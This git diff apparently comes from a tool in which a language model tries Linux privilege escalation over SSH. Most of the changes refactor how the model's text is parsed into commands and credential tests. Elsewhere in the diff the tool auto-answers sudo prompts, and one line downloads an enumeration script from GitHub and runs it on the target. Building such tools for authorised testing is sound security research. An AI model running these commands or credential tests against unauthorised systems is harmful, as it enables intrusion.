diff --git a/capabilities/capability.py b/capabilities/capability.py index 18f4ba0..7dd3ce7 100644 --- a/capabilities/capability.py +++ b/capabilities/capability.py @@ -1,6 +1,6 @@ import abc import inspect -from typing import Union, Type, Dict +from typing import Union, Type, Dict, Callable, Any from pydantic import create_model, BaseModel @@ -78,3 +78,95 @@ class Model(Action): return Model + +SimpleTextHandlerResult = tuple[bool, Union[str, tuple[str, str, ...]]] +SimpleTextHandler = Callable[[str], SimpleTextHandlerResult] + + +def capabilities_to_simple_text_handler(capabilities: Dict[str, Capability], default_capability: Capability = None, include_description: bool = True) -> tuple[Dict[str, str], SimpleTextHandler]: + """ + This function generates a simple text handler from a set of capabilities. + It is to be used when no function calling is available, and structured output is not to be trusted, which is why it + only supports the most basic of parameter types for the capabilities (str, int, float, bool). + + As result it returns a dictionary of capability names to their descriptions and a parser function that can be used + to parse the text input and execute it. The first return value of the parser function is a boolean indicating + whether the parsing was successful, the second return value is a tuple containing the capability name, the parameters + as a string and the result of the capability execution. + """ + def get_simple_fields(func, name) -> Dict[str, Type]: + sig = inspect.signature(func) + fields = {param: param_info.annotation for param, param_info in sig.parameters.items()} + for param, param_type in fields.items(): + if param_type not in (str, int, float, bool): + raise ValueError(f"The command {name} is not compatible with this calling convention (this is not a LLM error, but rather a problem with the capability itself, the parameter {param} is {param_type} and not a simple type (str, int, float, bool))") + return fields + + def parse_params(fields, params) -> tuple[bool, Union[str, Dict[str, Any]]]: + split_params = params.split(" ", maxsplit=len(fields) - 1) + if len(split_params) != len(fields): + return False, "Invalid number of parameters" + + parsed_params = dict() + for param, param_type in fields.items(): + try: + parsed_params[param] = param_type(split_params.pop(0)) + except ValueError as e: + return False, f"Could not parse parameter {param}: {e}" + return True, parsed_params + + capability_descriptions = dict() + capability_params = dict() + for capability_name, capability in capabilities.items(): + fields = get_simple_fields(capability.__call__, capability_name) + + description = f"`{capability_name}" + if len(fields) > 0: + description += " " + " ".join(param for param in fields) + description += "`" + if include_description: + description += f": {capability.describe()}" + + capability_descriptions[capability_name] = description + capability_params[capability_name] = fields + + def parser(text: str) -> SimpleTextHandlerResult: + capability_name_and_params = text.split(" ", maxsplit=1) + if len(capability_name_and_params) == 1: + capability_name = capability_name_and_params[0] + params = "" + else: + capability_name, params = capability_name_and_params + if capability_name not in capabilities: + return False, "Unknown command" + + success, parsing_result = parse_params(capability_params[capability_name], params) + if not success: + return False, parsing_result + + return True, (capability_name, params, capabilities[capability_name](**parsing_result)) + + resolved_parser: SimpleTextHandler = parser + + if default_capability is not None: + default_fields = get_simple_fields(default_capability.__call__, "__default__") + + def default_capability_parser(text: str) -> SimpleTextHandlerResult: + success, *output = parser(text) + if success: + return success, *output + + params = text + success, parsing_result = parse_params(default_fields, params) + if not success: + params = text.split(" ", maxsplit=1)[1] + success, parsing_result = parse_params(default_fields, params) + if not success: + return False, parsing_result + + return True, (capability_name, params, default_capability(**parsing_result)) + + + resolved_parser = default_capability_parser + + return capability_descriptions, resolved_parser diff --git a/capabilities/psexec_test_credential.py b/capabilities/psexec_test_credential.py index 0d8597e..173ec68 100644 --- a/capabilities/psexec_test_credential.py +++ b/capabilities/psexec_test_credential.py @@ -11,7 +11,7 @@ class PSExecTestCredential(Capability): conn: PSExecConnection def describe(self) -> str: - return f"give credentials to be tested by stating `{self.get_name()} username password`" + return f"give credentials to be tested" def get_name(self) -> str: return "test_credential" diff --git a/capabilities/ssh_run_command.py b/capabilities/ssh_run_command.py index 6086e3e..0ecf95c 100644 --- a/capabilities/ssh_run_command.py +++ b/capabilities/ssh_run_command.py @@ -18,19 +18,17 @@ @dataclass class SSHRunCommand(Capability): conn: SSHConnection + timeout: int = 10 def describe(self) -> str: - return f"give a command to be executed by stating `{self.get_name()} command arguments` and I will respond with the terminal output when running this command over SSH on the linux machine. The given command must not require user interaction." + return f"give a command to be executed and I will respond with the terminal output when running this command over SSH on the linux machine. The given command must not require user interaction." def get_name(self): return "exec_command" - def __call__(self, command: str, timeout:int=10) -> Tuple[str, bool]: + def __call__(self, command: str) -> Tuple[str, bool]: got_root = False - cmd_parts = command.split(" ", 1) - command = cmd_parts[1] - sudo_pass = Responder( pattern=r'\[sudo\] password for ' + self.conn.username + ':', response=self.conn.password + '\n', @@ -39,7 +37,7 @@ def __call__(self, command: str, timeout:int=10) -> Tuple[str, bool]: out = StringIO() try: - resp = self.conn.run(command, pty=True, warn=True, out_stream=out, watchers=[sudo_pass], timeout=timeout) + resp = self.conn.run(command, pty=True, warn=True, out_stream=out, watchers=[sudo_pass], timeout=self.timeout) except Exception as e: print("TIMEOUT! Could we have become root?") out.seek(0) diff --git a/capabilities/ssh_test_credential.py b/capabilities/ssh_test_credential.py index f0c1fea..e64814f 100644 --- a/capabilities/ssh_test_credential.py +++ b/capabilities/ssh_test_credential.py @@ -12,19 +12,13 @@ class SSHTestCredential(Capability): conn: SSHConnection def describe(self) -> str: - return f"give credentials to be tested by stating `{self.get_name()} username password`" + return f"give credentials to be tested" def get_name(self): return "test_credential" - def __call__(self, command: str) -> Tuple[str, bool]: - cmd_parts = command.split(" ") - assert (cmd_parts[0] == self.get_name()) - - if len(cmd_parts) != 3: - return "didn't provide username/password", False - - test_conn = self.conn.new_with(username=cmd_parts[1], password=cmd_parts[2]) + def __call__(self, username: str, password: str) -> Tuple[str, bool]: + test_conn = self.conn.new_with(username=username, password=password) try: test_conn.init() user = test_conn.run("whoami")[0].strip('\n\r ') diff --git a/usecases/agents.py b/usecases/agents.py index f81b0ce..1fe4b10 100644 --- a/usecases/agents.py +++ b/usecases/agents.py @@ -1,26 +1,27 @@ +from abc import ABC from dataclasses import dataclass, field from typing import Dict -from capabilities.capability import Capability +from capabilities.capability import Capability, capabilities_to_simple_text_handler from usecases.common_patterns import RoundBasedUseCase @dataclass -class Agent(RoundBasedUseCase): - +class Agent(RoundBasedUseCase, ABC): _capabilities: Dict[str, Capability] = field(default_factory=dict) _default_capability: Capability = None def init(self): super().init() - def add_capability(self, cap:Capability, default:bool=False): + def add_capability(self, cap: Capability, default: bool = False): self._capabilities[cap.get_name()] = cap if default: self._default_capability = cap - def get_capability(self, name:str) -> Capability: + def get_capability(self, name: str) -> Capability: return self._capabilities.get(name, self._default_capability) def get_capability_block(self) -> str: - return "You can either\n\n" + "\n".join(map(lambda i: f"- {i.describe()}", self._capabilities.values())) + capability_descriptions, _parser = capabilities_to_simple_text_handler(self._capabilities) + return "You can either\n\n" + "\n".join(f"- {description}" for description in capability_descriptions.values()) diff --git a/usecases/privesc/common.py b/usecases/privesc/common.py index 14d0404..71068ad 100644 --- a/usecases/privesc/common.py +++ b/usecases/privesc/common.py @@ -6,6 +6,7 @@ from rich.panel import Panel from capabilities import Capability +from capabilities.capability import capabilities_to_simple_text_handler from usecases.agents import Agent from utils import llm_util, ui from utils.cli_history import SlidingCliHistory @@ -48,10 +49,13 @@ def perform_round(self, turn): with self.console.status("[bold green]Executing that command..."): self.console.print(Panel(answer.result, title="[bold cyan]Got command from LLM:")) - capability = cmd.split(" ", 1)[0] - result, got_root = self.get_capability(capability)(cmd) - if capability == "exec_command": - cmd = cmd[len(capability)+1:] + _capability_descriptions, parser = capabilities_to_simple_text_handler(self._capabilities, default_capability=self._default_capability) + success, *output = parser(cmd) + if not success: + self.console.print(Panel(output[0], title=f"[bold red]Error parsing command:")) + return False + + capability, cmd, (result, got_root) = output # log and output the command and its result self.log_db.add_log_query(self._run_id, turn, cmd, result, answer) diff --git a/usecases/privesc/linux.py b/usecases/privesc/linux.py index 309a747..4b4a88d 100644 --- a/usecases/privesc/linux.py +++ b/usecases/privesc/linux.py @@ -104,7 +104,7 @@ def read_hint(self): run_cmd = "wget -q 'https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh' -O lse.sh;chmod 700 lse.sh; ./lse.sh -c -i -l 0 | grep -v 'nope$' | grep -v 'skip$'" - result, got_root = SSHRunCommand(conn=self.conn)(run_cmd, timeout=120) + result, got_root = SSHRunCommand(conn=self.conn, timeout=120)(run_cmd) self.console.print("[yellow]got the output: " + result) cmd = self.llm.get_response(template_lse, lse_output=result, number=3) diff --git a/utils/configurable.py b/utils/configurable.py index d2d7dae..33a451c 100644 --- a/utils/configurable.py +++ b/utils/configurable.py @@ -114,7 +114,7 @@ def get_parameters(fun, basename: str, fields: Dict[str, dataclasses.Field] = No if hasattr(type, "__parameters__"): params[name] = ComplexParameterDefinition(name, type, default, description, get_class_parameters(type, f"{basename}.{fun.__name__}")) - elif type in (str, int, bool): + elif type in (str, int, float, bool): params[name] = ParameterDefinition(name, type, default, description) else: raise ValueError(f"Parameter {name} of {basename}.{fun.__name__} must have str, int, bool, or a __parameters__ class as type, not {type}")